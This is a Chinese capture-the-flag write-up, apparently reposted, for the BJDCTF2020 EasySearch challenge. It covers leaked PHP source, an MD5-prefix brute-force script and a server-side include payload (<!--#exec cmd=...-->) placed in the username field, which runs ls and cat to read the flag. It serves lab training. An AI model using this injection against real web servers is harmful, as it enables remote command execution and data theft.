第六十题——[BJDCTF2020]EasySearch

Posted 想学习安全的小白

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第六十题——[BJDCTF2020]EasySearch相关的知识,希望对你有一定的参考价值。

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,叫我们输入用户名与密码,使用dirsearch扫描出来index.php.swp目录,下载下来是源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

第二步:代码审计

  1. 当我们传入username参数时,需要让passwrod参数的前六个字符用md5加密得到6d0bc1
  2. 在public目录下生成一个shtml后缀名的文件
  3. 文件会写入username参数的数据

第三步:构建漏洞

  1. 生成shtml后缀名可以得知开启了SSI服务,而SSI可以使用<!--#exec cmd=”id” -->写入文件里面执行cmd语句
  2. 构建password,使用hashlib库,获取符合条件的password,hashlib库使用说明
import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

第四步:获取flag

  1. 输入username=1,password=2020666,使用burpsuite改包,修改username
    在这里插入图片描述

  2. 访问给出的url,发现执行了ls,但没有找到flag
    在这里插入图片描述

  3. 使用ls ../查看上一级目录,发现flag
    在这里插入图片描述

  4. 使用cat ../flag_990c66bf85a09c664f0b6741840499b2获取flag
    在这里插入图片描述

以上是关于第六十题——[BJDCTF2020]EasySearch的主要内容,如果未能解决你的问题,请参考以下文章

leetcode 简单 第六十题 反转链表

第六十题(在O时间内删除链表结点)

《剑指offer》第六十题:n个骰子的点数

《每日一题》之第六十题考查知识点:指派问题动态规划问题(题源自上海海事大学09年真题第五大题)(图一为昨天题目答案)

每日一题 为了工作 2020 0502 第六十一题

每日一题 为了工作 2020 0510 第六十八题